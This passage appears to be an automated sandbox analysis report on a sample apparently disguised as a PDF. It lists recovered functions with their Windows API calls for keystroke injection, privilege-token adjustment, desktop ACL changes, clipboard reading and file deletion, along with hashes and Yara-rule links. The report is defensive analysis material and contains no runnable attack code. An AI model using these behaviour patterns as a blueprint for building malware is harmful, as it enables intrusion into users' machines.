                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 0bc8d4cf15070ba16a5dc00b9986324ac9a46724a6847701ee06393e58574efe
                                                    • Instruction ID: 0676c6f2c52ec27a23e5dd4b82adc61f65f349e0f1ce251bd16dc7c1dda97a8b
                                                    • Opcode Fuzzy Hash: 0bc8d4cf15070ba16a5dc00b9986324ac9a46724a6847701ee06393e58574efe
                                                    • Instruction Fuzzy Hash: F512BF71500608AFEB269F64CC49FAEBBB8FF46710F114229F915DB2E1DB709941CB11
                                                    Function 0035EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0035EB4A
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B3AEA
                                                    • IsIconic.USER32(000000FF), ref: 003B3AF3
                                                    • ShowWindow.USER32(000000FF,00000009), ref: 003B3B00
                                                    • SetForegroundWindow.USER32(000000FF), ref: 003B3B0A
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003B3B20
                                                    • GetCurrentThreadId.KERNEL32 ref: 003B3B27
                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003B3B33
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B44
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B4C
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 003B3B54
                                                    • SetForegroundWindow.USER32(000000FF), ref: 003B3B57
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B6C
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3B77
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B81
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3B86
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B8F
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3B94
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B9E
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3BA3
                                                    • SetForegroundWindow.USER32(000000FF), ref: 003B3BA6
                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003B3BCD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                                    • Instruction ID: 75c41288045e8dae93a67328ab7b9054cdae322fec5a2fd96350fd2e7a3ffe29
                                                    • Opcode Fuzzy Hash: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                                    • Instruction Fuzzy Hash: 40318771A403287BEB225F659C49FBF7E6CEB84B54F114025FB05EA1D0D6B16D10EBA0
                                                    Function 0037ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                                      • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                                      • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                                    • _memset.LIBCMT ref: 0037AD08
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0037AD5A
                                                    • CloseHandle.KERNEL32(?), ref: 0037AD6B
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0037AD82
                                                    • GetProcessWindowStation.USER32 ref: 0037AD9B
                                                    • SetProcessWindowStation.USER32(00000000), ref: 0037ADA5
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037ADBF
                                                      • Part of subcall function 0037AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                                      • Part of subcall function 0037AB84: CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $H*?$default$winsta0
                                                    • API String ID: 2063423040-2897388558
                                                    • Opcode ID: b7c65176873776f7599144572452c6b45f685c6a93b8aa33f9af19222562ef56
                                                    • Instruction ID: 2f81ed0590f76539943918e0a34b078f637e1544a8293ab659d2183c87ced6c1
                                                    • Opcode Fuzzy Hash: b7c65176873776f7599144572452c6b45f685c6a93b8aa33f9af19222562ef56
                                                    • Instruction Fuzzy Hash: 9D819E71800209EFDF239FA4CC45EEEBB78EF48344F058129F918A6561D7399E54DB62
                                                    Function 003860DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00385FA6,?), ref: 00386EF1
                                                      • Part of subcall function 0038725E: __wsplitpath.LIBCMT ref: 0038727B
                                                      • Part of subcall function 0038725E: __wsplitpath.LIBCMT ref: 0038728E
                                                      • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                                    • _wcscat.LIBCMT ref: 00386149
                                                    • _wcscat.LIBCMT ref: 00386167
                                                    • __wsplitpath.LIBCMT ref: 0038618E
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003861A4
                                                    • _wcscpy.LIBCMT ref: 00386209
                                                    • _wcscat.LIBCMT ref: 0038621C
                                                    • _wcscat.LIBCMT ref: 0038622F
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0038625D
                                                    • DeleteFileW.KERNEL32(?), ref: 0038626E
                                                    • MoveFileW.KERNEL32(?,?), ref: 00386289
                                                    • MoveFileW.KERNEL32(?,?), ref: 00386298
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 003862AD
                                                    • DeleteFileW.KERNEL32(?), ref: 003862BE
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003862E1
                                                    • FindClose.KERNEL32(00000000), ref: 003862FD
                                                    • FindClose.KERNEL32(00000000), ref: 0038630B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1917200108-1173974218
                                                    • Opcode ID: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                                    • Instruction ID: b43a3e75efc78c7ab9368541ace232fa5474c8cc1aa914c931402a74ca30b203
                                                    • Opcode Fuzzy Hash: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                                    • Instruction Fuzzy Hash: 7C51227280821C6ACB22FB91DC46DEF77BCAF05300F0945EAE585E7141DE76A7498FA4
                                                    Function 00396B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32(003DDC00), ref: 00396B36
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00396B44
                                                    • GetClipboardData.USER32(0000000D), ref: 00396B4C
                                                    • CloseClipboard.USER32 ref: 00396B58
                                                    • GlobalLock.KERNEL32(00000000), ref: 00396B74
                                                    • CloseClipboard.USER32 ref: 00396B7E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00396B93
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00396BA0
                                                    • GetClipboardData.USER32(00000001), ref: 00396BA8
                                                    • GlobalLock.KERNEL32(00000000), ref: 00396BB5
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00396BE9
                                                    • CloseClipboard.USER32 ref: 00396CF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                                    • Instruction ID: 06667a683c48bb94a1c55175f898984522ff46fa87ce709e1ba8d4f1a1f81ab5
                                                    • Opcode Fuzzy Hash: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                                    • Instruction Fuzzy Hash: FA51AC31205201ABD703AF65DD96F6E77ACEF84B00F010429F696DA2E1EF70E905CB62
                                                    Function 0038F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038F62B
                                                    • FindClose.KERNEL32(00000000), ref: 0038F67F
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6A4
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6BB
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038F6E2
                                                    • __swprintf.LIBCMT ref: 0038F72E
                                                    • __swprintf.LIBCMT ref: 0038F767
                                                    • __swprintf.LIBCMT ref: 0038F7BB
                                                      • Part of subcall function 0036172B: __woutput_l.LIBCMT ref: 00361784
                                                    • __swprintf.LIBCMT ref: 0038F809
                                                    • __swprintf.LIBCMT ref: 0038F858
                                                    • __swprintf.LIBCMT ref: 0038F8A7
                                                    • __swprintf.LIBCMT ref: 0038F8F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 835046349-2428617273
                                                    • Opcode ID: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                                    • Instruction ID: 742999cb9fa96a2c57aba02c127b0606c104cc507fc28823e6873e47d5e2298b
                                                    • Opcode Fuzzy Hash: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                                    • Instruction Fuzzy Hash: 8FA110B2408344ABC352EB94C885DAFB7ECAF98705F444D2EF585CA152EB34E949C762
                                                    Function 00391B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00391B50
                                                    • _wcscmp.LIBCMT ref: 00391B65
                                                    • _wcscmp.LIBCMT ref: 00391B7C
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00391B8E
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00391BA8
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00391BC0
                                                    • FindClose.KERNEL32(00000000), ref: 00391BCB
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00391BE7
                                                    • _wcscmp.LIBCMT ref: 00391C0E
                                                    • _wcscmp.LIBCMT ref: 00391C25
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00391C37
                                                    • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391C55
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391C5F
                                                    • FindClose.KERNEL32(00000000), ref: 00391C6C
                                                    • FindClose.KERNEL32(00000000), ref: 00391C7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                                    • Instruction ID: 4553d73e19d503c10d574b26e8584c90484f702f1e56bbdb2301ae52bff8018c
                                                    • Opcode Fuzzy Hash: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                                    • Instruction Fuzzy Hash: 6F31C23254021A6BDF23EBB4EC49EEE77AC9F05320F1545A6F915E3090EB70EA458F64
                                                    Function 00391C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00391CAB
                                                    • _wcscmp.LIBCMT ref: 00391CC0
                                                    • _wcscmp.LIBCMT ref: 00391CD7
                                                      • Part of subcall function 00386BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00386BEF
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00391D06
                                                    • FindClose.KERNEL32(00000000), ref: 00391D11
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00391D2D
                                                    • _wcscmp.LIBCMT ref: 00391D54
                                                    • _wcscmp.LIBCMT ref: 00391D6B
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00391D7D
                                                    • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391D9B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391DA5
                                                    • FindClose.KERNEL32(00000000), ref: 00391DB2
                                                    • FindClose.KERNEL32(00000000), ref: 00391DC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                                    • Instruction ID: 1b7d5a0bf39d7d410613f7bd01548c796c2e29c260efdcf815f922e0c42d9e09
                                                    • Opcode Fuzzy Hash: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                                    • Instruction Fuzzy Hash: A631FE3250061B6ADF23EBA0EC09EEE77AC9F05324F1545A5F901F61A1DB70EE458B64
                                                    Function 00347D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                    • API String ID: 2102423945-2023335898
                                                    • Opcode ID: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                                    • Instruction ID: 1dfe9c3a63647fbf643f2e0307fb4fa64be34248bd9421694f1038f40246ff0b
                                                    • Opcode Fuzzy Hash: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                                    • Instruction Fuzzy Hash: 8282C071D04219CFCB26CF98C8807EDBBB5BF44314F2681A9D959AB751E730AE85CB90
                                                    Function 0039091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 003909DF
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 003909EF
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003909FB
                                                    • __wsplitpath.LIBCMT ref: 00390A59
                                                    • _wcscat.LIBCMT ref: 00390A71
                                                    • _wcscat.LIBCMT ref: 00390A83
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00390A98
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AAC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390ADE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AFF
                                                    • _wcscpy.LIBCMT ref: 00390B0B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00390B4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                                    • Instruction ID: 0d099e1c82a6cd5f16f2fa7d7ce258d3c366e6be426a284a2e8f20e7ba31b93e
                                                    • Opcode Fuzzy Hash: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                                    • Instruction Fuzzy Hash: 4C615A725043059FDB15EF60C84599EB3E8FF89314F04891AF989DB252DB31EA45CB92
                                                    Function 00346F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$T.?$UCP)$UTF)$UTF16)$>>> >
                                                    • API String ID: 0-711257144
                                                    • Opcode ID: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                                    • Instruction ID: 65d22b3bfe05532eb623a4eeef9bfbd0f57ed2b5cb6334f4b006f9dc0a0fdb26
                                                    • Opcode Fuzzy Hash: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                                    • Instruction Fuzzy Hash: 6C728E75E042199BDB26DF59C880BBEB7F5BF08310F15816AE905EB680DB709E41DB90
                                                    Function 0037A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                                      • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                                      • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                                      • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                                      • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                                      • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                                      • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A6D0
                                                    • _memset.LIBCMT ref: 0037A6E5
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A704
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A715
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0037A752
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A76E
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A78B
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A79A
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0037A7A1
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A7C2
                                                    • CopySid.ADVAPI32(00000000), ref: 0037A7C9
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A7FA
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037A820
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037A834
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
